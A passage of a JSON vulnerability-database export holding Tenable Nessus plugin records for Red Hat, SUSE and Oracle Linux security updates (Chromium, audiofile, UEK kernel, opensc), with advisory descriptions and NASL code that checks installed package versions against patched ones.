Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:3803\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-71.0.3578.80-1.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-71.0.3578.80-1.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-debuginfo-71.0.3578.80-1.el6_10\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-71.0.3578.80-1.el6_10\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-12-12T03:57:51", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=1111586", "https://www.suse.com/security/cve/CVE-2018-17095/", "http://www.nessus.org/u?f5d1f7d7"], "pluginID": "119572", "description": "This update for audiofile fixes the following issues :\n\nCVE-2018-17095: A heap-based buffer overflow in Expand3To4Module::run could occurred when running sfconvert leading to crashes or code execution when handling untrusted soundfiles (bsc#1111586).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 1, "reporter": "Tenable", "published": "2018-12-11T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : audiofile (SUSE-SU-2018:3588-2)", "type": "nessus", "enchantments": {}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17095"], "modified": "2018-12-11T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:audiofile-debugsource", "p-cpe:/a:novell:suse_linux:libaudiofile1-debuginfo", "p-cpe:/a:novell:suse_linux:audiofile-debuginfo", "p-cpe:/a:novell:suse_linux:audiofile", "p-cpe:/a:novell:suse_linux:libaudiofile1"], "id": "SUSE_SU-2018-3588-2.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=119572", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:3588-2.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119572);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/12/11 12:42:59\");\n\n script_cve_id(\"CVE-2018-17095\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : audiofile (SUSE-SU-2018:3588-2)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for audiofile fixes the following issues :\n\nCVE-2018-17095: A heap-based buffer overflow in Expand3To4Module::run\ncould occurred when running sfconvert leading to crashes or code\nexecution when handling untrusted soundfiles (bsc#1111586).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1111586\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-17095/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20183588-2/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f5d1f7d7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12-SP4:zypper in -t\npatch SUSE-SLE-SDK-12-SP4-2018-2542=1\n\nSUSE Linux Enterprise Server 12-SP4:zypper in -t patch\nSUSE-SLE-SERVER-12-SP4-2018-2542=1\n\nSUSE Linux Enterprise Desktop 12-SP4:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP4-2018-2542=1\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:audiofile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:audiofile-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:audiofile-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libaudiofile1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libaudiofile1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP4\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! ereg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"audiofile-0.3.6-11.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"audiofile-debuginfo-0.3.6-11.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"audiofile-debugsource-0.3.6-11.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libaudiofile1-0.3.6-11.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libaudiofile1-debuginfo-0.3.6-11.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libaudiofile1-32bit-0.3.6-11.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libaudiofile1-debuginfo-32bit-0.3.6-11.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"audiofile-0.3.6-11.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"audiofile-debuginfo-0.3.6-11.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"audiofile-debugsource-0.3.6-11.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"libaudiofile1-0.3.6-11.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"libaudiofile1-32bit-0.3.6-11.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"libaudiofile1-debuginfo-0.3.6-11.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"libaudiofile1-debuginfo-32bit-0.3.6-11.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"audiofile\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-12-12T03:38:18", "references": ["https://oss.oracle.com/pipermail/el-errata/2018-December/008325.html"], "pluginID": "119567", "description": "Description of changes:\n\n[2.6.39-400.304.1.el6uek]\n- mnt: Prevent pivot_root from creating a loop in the mount tree (Eric W. Biederman) [Orabug: 26575709] {CVE-2014-7970} {CVE-2014-7970}\n- vfs: more mnt_parent cleanups (Al Viro) [Orabug: 26575709] {CVE-2014-7970}\n- vfs: new internal helper: mnt_has_parent(mnt) (Al Viro) [Orabug: 26575709] {CVE-2014-7970}\n- ALSA: seq: Fix racy pool initializations (Takashi Iwai) [Orabug: 28459730] {CVE-2018-7566}\n- xen-netback: calculate full_coalesce before the pre-estimation of ring buffer slots to consume (Dongli Zhang) [Orabug: 28818690] - scsi: sg: allocate with __GFP_ZERO in sg_build_indirect() (Alexander Potapenko) [Orabug: 28892695] {CVE-2018-1000204}\n- KVM: MTRR: remove MSR 0x2f8 (Andy Honig) [Orabug: 28901711] {CVE-2016-3713} {CVE-2016-3713}\n- cdrom: fix improper type cast, which can leat to information leak. (Young_X) [Orabug: 28929788] {CVE-2018-16658} {CVE-2018-10940} {CVE-2018-18710}\n- udf: Check component length before reading it (Jan Kara) [Orabug: 28941923] {CVE-2014-9728}\n- udf: Verify symlink size before loading it (Shan Hai) [Orabug: 28941923] {CVE-2014-9728}\n- udf: Verify i_size when loading inode (Shan Hai) [Orabug: 28941923] {CVE-2014-9728}\n- floppy: Do not copy a kernel pointer to user memory in FDGETPRM ioctl (Andy Whitcroft) [Orabug: 28956549] {CVE-2018-7755} {CVE-2018-7755}\n- crypto: salsa20 - fix blkcipher_walk API usage (Eric Biggers) [Orabug: 28976586] {CVE-2017-17805}\n- crypto: hmac - require that the underlying hash algorithm is unkeyed (Eric Biggers) [Orabug: 28976655] {CVE-2017-17806}", "edition": 1, "reporter": "Tenable", "published": "2018-12-11T00:00:00", "title": "Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2018-4301)", "type": "nessus", "enchantments": {}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10940", "CVE-2018-7566", "CVE-2018-7755", "CVE-2017-17805", "CVE-2014-9728", "CVE-2018-18710", "CVE-2018-1000204", "CVE-2018-16658", "CVE-2016-3713", "CVE-2014-7970", "CVE-2017-17806"], "modified": "2018-12-11T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2018-4301.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=119567", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2018-4301.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119567);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/12/11 12:42:59\");\n\n script_cve_id(\"CVE-2014-7970\", \"CVE-2014-9728\", \"CVE-2016-3713\", \"CVE-2017-17805\", \"CVE-2017-17806\", \"CVE-2018-1000204\", \"CVE-2018-10940\", \"CVE-2018-16658\", \"CVE-2018-18710\", \"CVE-2018-7566\", \"CVE-2018-7755\");\n\n script_name(english:\"Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2018-4301)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[2.6.39-400.304.1.el6uek]\n- mnt: Prevent pivot_root from creating a loop in the mount tree (Eric \nW. Biederman) [Orabug: 26575709] {CVE-2014-7970} {CVE-2014-7970}\n- vfs: more mnt_parent cleanups (Al Viro) [Orabug: 26575709] {CVE-2014-7970}\n- vfs: new internal helper: mnt_has_parent(mnt) (Al Viro) [Orabug: \n26575709] {CVE-2014-7970}\n- ALSA: seq: Fix racy pool initializations (Takashi Iwai) [Orabug: \n28459730] {CVE-2018-7566}\n- xen-netback: calculate full_coalesce before the pre-estimation of ring \nbuffer slots to consume (Dongli Zhang) [Orabug: 28818690] - scsi: sg: \nallocate with __GFP_ZERO in sg_build_indirect() (Alexander Potapenko) \n[Orabug: 28892695] {CVE-2018-1000204}\n- KVM: MTRR: remove MSR 0x2f8 (Andy Honig) [Orabug: 28901711] \n{CVE-2016-3713} {CVE-2016-3713}\n- cdrom: fix improper type cast, which can leat to information leak. \n(Young_X) [Orabug: 28929788] {CVE-2018-16658} {CVE-2018-10940} \n{CVE-2018-18710}\n- udf: Check component length before reading it (Jan Kara) [Orabug: \n28941923] {CVE-2014-9728}\n- udf: Verify symlink size before loading it (Shan Hai) [Orabug: \n28941923] {CVE-2014-9728}\n- udf: Verify i_size when loading inode (Shan Hai) [Orabug: 28941923] \n{CVE-2014-9728}\n- floppy: Do not copy a kernel pointer to user memory in FDGETPRM ioctl \n(Andy Whitcroft) [Orabug: 28956549] {CVE-2018-7755} {CVE-2018-7755}\n- crypto: salsa20 - fix blkcipher_walk API usage (Eric Biggers) [Orabug: \n28976586] {CVE-2017-17805}\n- crypto: hmac - require that the underlying hash algorithm is unkeyed \n(Eric Biggers) [Orabug: 28976655] {CVE-2017-17806}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-December/008325.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-2.6.39-400.304.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-2.6.39-400.304.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-devel-2.6.39-400.304.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-devel-2.6.39-400.304.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-doc-2.6.39-400.304.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-firmware-2.6.39-400.304.1.el6uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-12T03:57:57", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=1107033", "https://bugzilla.suse.com/show_bug.cgi?id=1107034", "https://www.suse.com/security/cve/CVE-2018-16420/", "https://www.suse.com/security/cve/CVE-2018-16391/", "https://bugzilla.suse.com/show_bug.cgi?id=1107037", "https://bugzilla.suse.com/show_bug.cgi?id=1106999", "https://www.suse.com/security/cve/CVE-2018-16393/", "https://www.suse.com/security/cve/CVE-2018-16419/", "https://www.suse.com/security/cve/CVE-2018-16427/", "https://bugzilla.suse.com/show_bug.cgi?id=1108318", "https://bugzilla.suse.com/show_bug.cgi?id=1104812", "https://bugzilla.suse.com/show_bug.cgi?id=1107107", "https://bugzilla.suse.com/show_bug.cgi?id=1107039", "https://www.suse.com/security/cve/CVE-2018-16392/", "https://bugzilla.suse.com/show_bug.cgi?id=1107097", "https://www.suse.com/security/cve/CVE-2018-16418/", "https://bugzilla.suse.com/show_bug.cgi?id=1107038", "https://bugzilla.suse.com/show_bug.cgi?id=1106998", "http://www.nessus.org/u?b7be03c8", "https://www.suse.com/security/cve/CVE-2018-16422/", "https://www.suse.com/security/cve/CVE-2018-16426/", "https://www.suse.com/security/cve/CVE-2018-16423/"], "pluginID": "119574", "description": "This update for opensc fixes the following issues :\n\nCVE-2018-16391: Fixed a denial of service when handling responses from a Muscle Card (bsc#1106998)\n\nCVE-2018-16392: Fixed a denial of service when handling responses from a TCOS Card (bsc#1106999)\n\nCVE-2018-16393: Fixed buffer overflows when handling responses from Gemsafe V1 Smartcards (bsc#1108318)\n\nCVE-2018-16418: Fixed buffer overflow when handling string concatenation in util_acl_to_str (bsc#1107039)\n\nCVE-2018-16419: Fixed several buffer overflows when handling responses from a Cryptoflex card (bsc#1107107)\n\nCVE-2018-16420: Fixed buffer overflows when handling responses from an ePass 2003 Card (bsc#1107097)\n\nCVE-2018-16422: Fixed single byte buffer overflow when handling responses from an esteid Card (bsc#1107038)\n\nCVE-2018-16423: Fixed double free when handling responses from a smartcard (bsc#1107037)\n\nCVE-2018-16426: Fixed endless recursion when handling responses from an IAS-ECC card (bsc#1107034)\n\nCVE-2018-16427: Fixed out of bounds reads when handling responses in OpenSC (bsc#1107033)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 1, "reporter": "Tenable", "published": "2018-12-11T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : opensc (SUSE-SU-2018:3622-2)", "type": "nessus", "enchantments": {}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-16420", "CVE-2018-16419", "CVE-2018-16393", "CVE-2018-16392", "CVE-2018-16418", "CVE-2018-16391", "CVE-2018-16423", "CVE-2018-16426", "CVE-2018-16422", "CVE-2018-16427"], "modified": "2018-12-11T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:opensc-debuginfo", "p-cpe:/a:novell:suse_linux:opensc", "p-cpe:/a:novell:suse_linux:opensc-debugsource"], "id": "SUSE_SU-2018-3622-2.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=119574", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:3622-2.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119574);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/12/11 12:42:59\");\n\n script_cve_id(\"CVE-2018-16391\", \"CVE-2018-16392\", \"CVE-2018-16393\", \"CVE-2018-16418\", \"CVE-2018-16419\", \"CVE-2018-16420\", \"CVE-2018-16422\", \"CVE-2018-16423\", \"CVE-2018-16426\", \"CVE-2018-16427\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : opensc (SUSE-SU-2018:3622-2)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for opensc fixes the following issues :\n\nCVE-2018-16391: Fixed a denial of service when handling responses from\na Muscle Card (bsc#1106998)\n\nCVE-2018-16392: Fixed a denial of service when handling responses from\na TCOS Card (bsc#1106999)\n\nCVE-2018-16393: Fixed buffer overflows when handling responses from\nGemsafe V1 Smartcards (bsc#1108318)\n\nCVE-2018-16418: Fixed buffer overflow when handling string\nconcatenation in util_acl_to_str (bsc#1107039)\n\nCVE-2018-16419: Fixed several buffer overflows when handling responses\nfrom a Cryptoflex card (bsc#1107107)\n\nCVE-2018-16420: Fixed buffer overflows when handling responses from an\nePass 2003 Card (bsc#1107097)\n\nCVE-2018-16422: Fixed single byte buffer overflow when handling\nresponses from an esteid Card (bsc#1107038)\n\nCVE-2018-16423: Fixed double free when handling responses from a\nsmartcard (bsc#1107037)\n\nCVE-2018-16426: Fixed endless recursion when handling responses from\nan IAS-ECC card (bsc#1107034)\n\nCVE-2018-16427: Fixed out of bounds reads when handling responses in\nOpenSC (bsc#1107033)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1104812\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1106998\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1106999\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1107033\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1107034\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1107037\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1107038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1107039\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1107097\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1107107\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1108318\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-16391/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-16392/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-16393/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-16418/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-16419/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-16420/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-16422/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-16423/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-16426/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-16427/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20183622-2/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b7be03c8\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-SP4:zypper in -t patch\nSUSE-SLE-SERVER-12-SP4-2018-2582=1\n\nSUSE Linux Enterprise Desktop 12-SP4:zypper in -t 